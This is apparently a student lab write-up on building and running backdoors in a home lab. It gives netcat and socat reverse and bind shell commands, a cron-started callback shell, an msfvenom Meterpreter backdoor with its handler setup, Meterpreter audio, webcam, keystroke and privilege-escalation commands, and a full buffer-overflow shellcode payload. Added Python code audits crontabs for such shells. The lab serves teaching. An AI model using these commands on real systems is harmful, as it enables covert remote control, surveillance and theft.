2019-2020-2 20175222 "Network Countermeasure Technology" Backdoor Principles and Practice Exp2

Experiment contents

  • Use netcat to obtain a shell on the host, started by cron (0.5 points)
  • Use socat to obtain a shell on the host, started by a scheduled task (0.5 points)
  • Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it, and obtain a shell on the host (0.5 points)
  • Use MSF meterpreter (or other software) to generate a backdoor that captures audio, webcam pictures and keystrokes from the target host, and attempt privilege escalation (2 points)
  • Optional (1 point): generate shellcode with MSF, inject it into pwn1 from Exp1, and obtain a reverse-connection shell; write it up together with this experiment.

Basic questions

  • Give some examples of ways a backdoor could get onto your system.

    A: Running a program disguised as another application that the user was tricked into downloading.

  • Give examples of how a backdoor can start up (Windows and Linux).

    A: The backdoor is given a trigger condition; when the condition is met, for example a specific time arrives, the backdoor starts.

    On Windows, by modifying the registry; on Linux, by replacing a network service.

  • Which Meterpreter features impressed you most?

    A: Recording audio, taking screenshots, privilege escalation, stealing private data.

  • How would you find out whether a backdoor has been installed on your own system?

    A: Run antivirus software and a firewall, and inspect processes, open ports, the registry, network traffic and so on.

Preparation

1. Fixed IPs

  • Kali virtual machine in bridged mode, fixed IP: 192.168.28.129

  • Windows 10 host, fixed IP: 192.168.0.110

2. SSH remote login

PasswordAuthentication and PermitRootLogin were both set to yes, but password verification still failed and login was refused. I searched for methods online and tried for over two hours without success; so as not to delay the follow-up experiments, I gave up on remote operation.

3. Windows obtains a Linux shell

  • On Windows, listen on local port 5222 with netcat: .\nc64.exe -l -p 5222. In Windows PowerShell nc64.exe cannot be run by name alone; it has to be invoked as .\nc64.exe.

  • On Linux, connect back to Windows with nc 192.168.0.110 5222 -e /bin/sh. The -e option runs the named program (here /bin/sh) with its input and output attached to the connection, so whoever is listening gets a shell.

4. Linux obtains a Windows shell

  • On the Linux side, listen on port 5222 with nc -l -p 5222.

  • On Windows, connect back to port 5222 on the Linux host with .\nc64.exe -e powershell.exe 192.168.28.129 5222.

  • Result: Windows PowerShell on the left, the Kali shell on the right.

5. Use nc to transfer data

  • On Windows, listen on port 5222 with .\nc.exe -L -p 5222 (the -l option did not work; after searching online, switched to -L -p. In the Windows nc, -L keeps re-listening after the peer disconnects, so the listener stays up for repeated connections.)
  • On Linux, connect to port 5222 on the Windows host with nc 192.168.0.110 5222. Text typed on either side now appears on the other.

6. Use nc to transfer files

  • Linux to Windows

    • On Windows, listen on port 5222 and redirect whatever arrives into a file: .\nc64.exe -l -p 5222 > file1.out
    • On Linux, connect to port 5222 on the Windows host with the file on standard input: nc 192.168.0.110 5222 < file1.in. Windows receives the file sent from Linux.

  • Windows to Linux works the same way with the two roles swapped.
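The transfer above, as an added example that is not part of the original post: a Python model of the two nc commands on a loopback socket, with the SHA-256 comparison at both ends that nc itself never performs, and with the sender explicitly shutting down its write side, which is what makes the listener see end-of-file and close file1.out. The same check applies to the backdoor executable sent with nc in Experiment Three. The file content and the use of an OS-chosen port are constructed for the example.

```python
"""Loopback model of 'nc -l -p PORT > file1.out' / 'nc HOST PORT < file1.in',
with the SHA-256 comparison that nc itself does not perform (example code)."""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    """Hex SHA-256 of a file, streamed so a large binary need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(listener, dest_path):
    """Receiver side (nc -l -p PORT > dest): accept one connection and write
    everything that arrives until the peer closes its sending side (EOF)."""
    conn, _ = listener.accept()
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:            # b"" means the sender shut down its write side
                break
            out.write(chunk)


def send_file(host, port, src_path):
    """Sender side (nc HOST PORT < src): stream the file, then shut down the write
    side so the receiver sees EOF. Without that (or nc's -q/-N option on builds
    that need it) the receiver never gets EOF and never closes the file."""
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)


def transfer_and_verify(src_path, dest_path):
    """Transfer src_path to dest_path over loopback and compare both digests.
    Returns (bytes_received, src_digest, dest_digest, digests_match)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free ephemeral port
    listener.listen(1)
    port = listener.getsockname()[1]
    receiver = threading.Thread(target=receive_file, args=(listener, dest_path))
    receiver.start()
    send_file("127.0.0.1", port, src_path)
    receiver.join()
    listener.close()
    src_digest, dest_digest = sha256_of(src_path), sha256_of(dest_path)
    return os.path.getsize(dest_path), src_digest, dest_digest, src_digest == dest_digest


def demo():
    """Write a constructed binary-looking file1.in (stand-in for a backdoor .exe)
    into a temporary directory, transfer it, and return the verification tuple."""
    with tempfile.TemporaryDirectory() as d:
        src, dest = os.path.join(d, "file1.in"), os.path.join(d, "file1.out")
        with open(src, "wb") as f:
            f.write(bytes(range(256)) * 1024 + b"end of constructed sample\n")
        return transfer_and_verify(src, dest)


if __name__ == "__main__":
    size, src_digest, dest_digest, ok = demo()
    print(f"received {size} bytes; sha256 {dest_digest}; match={ok}")
```

With real nc the equivalent check is sha256sum on Linux and Get-FileHash in PowerShell on both copies. If the listening nc never exits after the file has been sent, the sending nc is still holding the connection open after end-of-file on its standard input; check nc -h on that build for a -q or -N option, or stop it by hand, and compare the hashes afterwards.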

Experiment

One

Use netcat to obtain a shell on the host, started by cron

On Windows, listen on port 5222 with ncat.exe -l -p 5222.

Cron is the scheduled-task service on Linux: it wakes up every minute and runs whatever the configuration file (the crontab) schedules for that moment.

  • crontab -e opens the current user's crontab for editing (-e means edit). Add on the last line 50 * * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh, which at minute 50 of every hour connects back to port 5222 on the Windows host and attaches /bin/sh to the connection.

  • When the clock reached 23:50 the listener on Windows received Kali's shell; ls lists the directory.
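Checking for this kind of persistence, as an added example that is not part of the original post: a Python audit that parses crontab text, flags entries that hand a shell to a network peer (netcat -e, socat exec:, bash /dev/tcp redirections, and @reboot entries of the same kind) and works out when each flagged entry fires next, which is how you confirm that the entry above runs at minute 50 of every hour. The crontab below is a constructed sample and the indicator patterns are a heuristic; on a real host feed the script the output of crontab -l for each user and the files under /etc/cron.d.

```python
"""Audit crontab text for cron-started reverse shells like the one in Experiment One
(example code; the crontab below is a constructed sample, not from a real host)."""
import re
from datetime import datetime, timedelta

SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
50 * * * * /bin/netcat 192.168.0.110 5222 -e /bin/sh
*/5 * * * * /usr/bin/socat tcp:10.0.0.5:4444 exec:/bin/bash,pty,stderr
30 2 * * 0 /bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
@reboot /bin/netcat 10.0.0.5 4444 -e /bin/sh
15 4 1 * * /usr/bin/tar czf /backup/home.tgz /home
"""

# Heuristic indicators of a shell being handed to a network peer; tune per host.
SUSPICIOUS = [
    re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"),   # netcat -e <program>
    re.compile(r"\bsocat\b.*\bexec:"),             # socat exec: address
    re.compile(r"/dev/tcp/"),                      # bash network redirection
    re.compile(r"\b(ba)?sh\s+-i\b"),               # interactive shell from cron
]


def parse_crontab(text):
    """Yield (schedule, command); schedule is five time fields or an @-keyword."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            keyword, _, command = line.partition(" ")
            yield keyword, command.strip()
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield " ".join(parts[:5]), parts[5]


def find_reverse_shell_entries(text):
    """Return [(schedule, command)] for entries matching any indicator."""
    return [(s, c) for s, c in parse_crontab(text) if any(p.search(c) for p in SUSPICIOUS)]


def field_matches(spec, value, lo, hi):
    """Match one cron field ('*', 'n', 'a-b', 'a,b', '*/n', 'a-b/n') against value."""
    for part in spec.split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if rng == "*":
            a, b = lo, hi
        elif "-" in rng:
            a, b = (int(x) for x in rng.split("-", 1))
        else:
            a = b = int(rng)
        if a <= value <= b and (value - a) % step == 0:
            return True
    return False


def schedule_matches(schedule, when):
    """True if a five-field schedule fires at the minute `when` (a datetime)."""
    minute, hour, dom, mon, dow = schedule.split()
    cron_dow = (when.weekday() + 1) % 7            # cron: Sunday=0; Python: Monday=0
    dow = dow.replace("7", "0")                    # cron also accepts 7 for Sunday
    time_ok = (field_matches(minute, when.minute, 0, 59)
               and field_matches(hour, when.hour, 0, 23)
               and field_matches(mon, when.month, 1, 12))
    dom_ok = field_matches(dom, when.day, 1, 31)
    dow_ok = field_matches(dow, cron_dow, 0, 6)
    if dom != "*" and dow != "*":                  # both restricted: cron ORs them
        return time_ok and (dom_ok or dow_ok)
    return time_ok and dom_ok and dow_ok


def next_fire(schedule, after, max_days=366):
    """First minute strictly after `after` at which the schedule fires; None for
    @-keywords (e.g. @reboot fires at boot) or if nothing fires within max_days."""
    if schedule.startswith("@"):
        return None
    t = after.replace(second=0, microsecond=0) + timedelta(minutes=1)
    end = t + timedelta(days=max_days)
    while t < end:
        if schedule_matches(schedule, t):
            return t
        t += timedelta(minutes=1)
    return None


def audit(text, now_iso):
    """Suspicious entries with the next time each fires after now_iso.
    Returns [(schedule, 'YYYY-MM-DD HH:MM' or None, command)]."""
    now = datetime.fromisoformat(now_iso)
    report = []
    for sched, cmd in find_reverse_shell_entries(text):
        nxt = next_fire(sched, now)
        report.append((sched, nxt.strftime("%Y-%m-%d %H:%M") if nxt else None, cmd))
    return report


if __name__ == "__main__":
    for sched, nxt, cmd in audit(SAMPLE_CRONTAB, "2020-03-21T23:10"):
        print(f"{sched:12} next {nxt or 'at boot':17} {cmd}")
```

The "next fires" column is what turns a suspicious line into evidence: for the entry from this experiment it prints 23:50, matching the time at which the shell arrived on the Windows side. Cron's dom/dow rule (when both fields are restricted, either one matching is enough) is reproduced, since a naive AND would mis-predict such entries.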

Two

Use socat to obtain a shell on the host, started by a scheduled task

  • On Windows, right-click This PC and open Computer Management; under System Tools open Task Scheduler and create a task.

  • On the General tab fill in the task name; on the Triggers tab click New Trigger and set the time at which the task fires.

  • On the Actions tab, set the program to the path of socat.exe (downloaded and unzipped beforehand) and in Add arguments enter tcp-listen:5222 exec:cmd.exe,pty,stderr. This binds cmd.exe to port 5222 and redirects cmd.exe's stderr into stdout, so error output also reaches the peer. Click OK to finish creating the task. Note that tcp-listen accepts a connection from any host that can reach port 5222: this is a bind shell, and whoever connects first gets cmd.exe with the privileges the task runs under.

  • Lock the computer and then unlock it again; socat starts.

  • On Kali enter socat - tcp:192.168.0.110:5222 (the - is standard input/output; the second address is a TCP connection to port 5222 on the Windows host, using the Windows IP). A cmd shell is obtained.

Three

Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it, and obtain a shell on the host.

Note

My Windows 10 had an unknown problem and could not run the program,

so I switched to a Windows 7 virtual machine.

      Windows 7 fixed IP: 192.168.28.131

  • On Kali enter msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.28.129 LPORT=5222 -f exe > 20175222_backdoor.exe (LHOST is the Kali IP) to generate the backdoor 20175222_backdoor.exe.
  • On Windows run nc.exe -lv -p 5222 > 20175222_backdoor.exe and wait.
  • On Kali enter nc 192.168.28.131 5222 < 20175222_backdoor.exe (the Windows IP) to send the generated backdoor to the Windows host; the transfer succeeds.
  • On Linux open another terminal and enter msfconsole to start the console.

  • Enter use exploit/multi/handler to select the listener module, then set the payload:

  • The payload must be the same one used to generate the backdoor: set payload windows/meterpreter/reverse_tcp

  • set LHOST 192.168.28.129, the Kali IP (the same IP given when generating the backdoor)

  • The port must match as well: set LPORT 5222

  • After setup is complete, exploit starts listening.

  • When the backdoor is run on Windows, Kali receives the connection and obtains a meterpreter session with remote control of the Windows host.

Four

Use MSF meterpreter (or other software) to generate a backdoor that captures audio, webcam pictures and keystrokes from the target host, and attempt privilege escalation.

  • Capture audio: record_mic

  • Take a picture with the camera: webcam_snap

    The virtual machine could not access the laptop's built-in camera, so this could not be done.

  • Screenshot: screenshot

  • Keystroke logging: keyscan_start begins recording; keyscan_dump reads the recorded keystrokes.

  • View the current user: getuid. Escalate privileges: getsystem

Additional content

Generate shellcode with MSF, inject it into pwn1 from Exp1, and obtain a reverse-connection shell.

  • The main steps are the same as in Exp1 and are not repeated here.

    Make the stack executable and disable address randomization:

    execstack -s pwn1    // make the stack of pwn1 executable
    execstack -q pwn1    // query whether the file's stack is executable
    more /proc/sys/kernel/randomize_va_space   // check the address-randomization state
    echo "0" > /proc/sys/kernel/randomize_va_space  // disable address randomization
  • gdb debugging

  • The value of %esp + 4 is 0xffffd584.

  • Accordingly, the first four \x bytes of the injection string (the return address, written in little-endian byte order) are changed to this value before injecting.

  • perl -e 'print "A" x 32;print"\x84\xd5\xff\xff\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_2
  • In another terminal, first start msfconsole

  • use exploit/multi/handler selects the handler

  • set payload linux/x86/shell_reverse_tcp, then set LHOST 127.0.0.1 sets the IP to the loopback address

  • set LPORT 4444 sets the port to the one built into the shellcode

  • exploit starts listening once setup is complete

  • Back in the first terminal run (cat input_2; cat) | ./pwn1; the shell is obtained successfully. The trailing cat keeps standard input open, the same idiom as in Exp1.
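The payload layout and the handler settings above, as an added example that is not the original post's code: a Python script that reproduces the perl command's bytes with struct (which makes the little-endian return address explicit), checks that no byte would terminate gets(), and decodes LHOST/LPORT from the shellcode so the handler in msfconsole can be set to match. PAD_LEN, NOP_LEN, RET_ADDR and the shellcode bytes are taken from the text; the decoder assumes the unencoded msfvenom linux/x86/shell_reverse_tcp layout shown above, in which the address is stored inverted to avoid NUL bytes and the port is pushed as a 16-bit word.

```python
"""Build the pwn1 injection input from the perl command above and check the
shellcode's built-in LHOST/LPORT before injecting (example code)."""
import ipaddress
import struct

# The 96-byte msfvenom linux/x86/shell_reverse_tcp shellcode from the perl
# command above (LHOST=127.0.0.1, LPORT=4444), copied byte for byte.
SHELLCODE = bytes.fromhex(
    "31c031db31c931d266b86701b302b101"
    "cd8089c3b880fffffe83f0ff50666811"
    "5c666a0289e1b21031c066b86a01cd80"
    "85c0752431c9b10231c0b03fcd804979"
    "f931c050682f2f7368682f62696e89e3"
    "31c931d2b00bcd80b30131c0b001cd80"
)
RET_ADDR = 0xFFFFD584   # %esp + 4 from gdb: start of the NOP sled
PAD_LEN = 32            # bytes between the input buffer and the saved return address
NOP_LEN = 5             # the five \x90 bytes in the perl command


def build_payload(ret_addr=RET_ADDR, shellcode=SHELLCODE, pad_len=PAD_LEN, nop_len=NOP_LEN):
    """Same bytes the perl command prints: padding, return address, NOP sled, shellcode.
    struct.pack('<I') writes the address little-endian, so 0xffffd584 becomes 84 d5 ff ff."""
    return b"A" * pad_len + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode


def gets_safe(payload):
    """pwn1 reads its input with gets(): a NUL ends the C string and a newline ends
    the read, so neither byte may appear anywhere in the injected data."""
    return b"\x00" not in payload and b"\n" not in payload


def decode_reverse_tcp(sc):
    """Recover (LHOST, LPORT) from msfvenom's unencoded linux/x86/shell_reverse_tcp:
    the address is stored inverted (mov eax, ~addr ; xor eax, 0xffffffff) so that
    127.0.0.1 contains no NUL bytes, and the port is a 'push word' in network order."""
    i = sc.index(b"\x83\xf0\xff")                       # xor eax, 0xffffffff
    if sc[i - 5] != 0xB8:                               # must follow mov eax, imm32
        raise ValueError("unexpected shellcode layout")
    inverted = struct.unpack("<I", sc[i - 4:i])[0]
    addr = ipaddress.IPv4Address(struct.pack("<I", inverted ^ 0xFFFFFFFF))
    j = sc.index(b"\x66\x68")                           # push word imm16 (the port)
    port = struct.unpack(">H", sc[j + 2:j + 4])[0]
    return str(addr), port


def handler_settings(sc=SHELLCODE):
    """msfconsole settings that must match this shellcode, as in the steps above."""
    addr, port = decode_reverse_tcp(sc)
    return f"set payload linux/x86/shell_reverse_tcp\nset LHOST {addr}\nset LPORT {port}\n"


if __name__ == "__main__":
    payload = build_payload()
    if not gets_safe(payload):
        raise SystemExit("payload contains a byte gets() would stop at")
    with open("input_2", "wb") as f:        # same file the perl command produces
        f.write(payload)
    print(f"wrote input_2 ({len(payload)} bytes); handler needs:\n{handler_settings()}")
```

Running it writes the same input_2 as the perl command; the decoded 127.0.0.1:4444 is exactly what the set LHOST and set LPORT steps above have to use, and the gets() check is what to rerun whenever the return address is changed for a different stack layout, since an address containing 0x00 or 0x0a would be cut off before the shellcode is ever reached.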

          

Experiment summary and experience

The problem encountered with ssh was that the password could not be used to log in; it kept reporting "Permission denied, please try again". By rights this should be solved as long as the content of /etc/ssh/sshd_config is changed to PermitRootLogin yes, but I do not know why trial and error could not solve it, including reinstalling the ssh service and modifying the file contents according to more sources. Because the ssh service does not affect the experiment, I finally gave up.

Another failure: after entering exploit in msfconsole, it turned out that use exploit/multi/handler had not taken effect; this was resolved by restarting msfconsole.

Basically the experiment did not run into many problems and could be completed successfully. Studying netcat, socat and MSF meterpreter was my formal first step towards understanding attack-and-defense technology; I found it very interesting and hope to learn more useful knowledge in the next lessons.


Origin www.cnblogs.com/cn171-101/p/12545756.html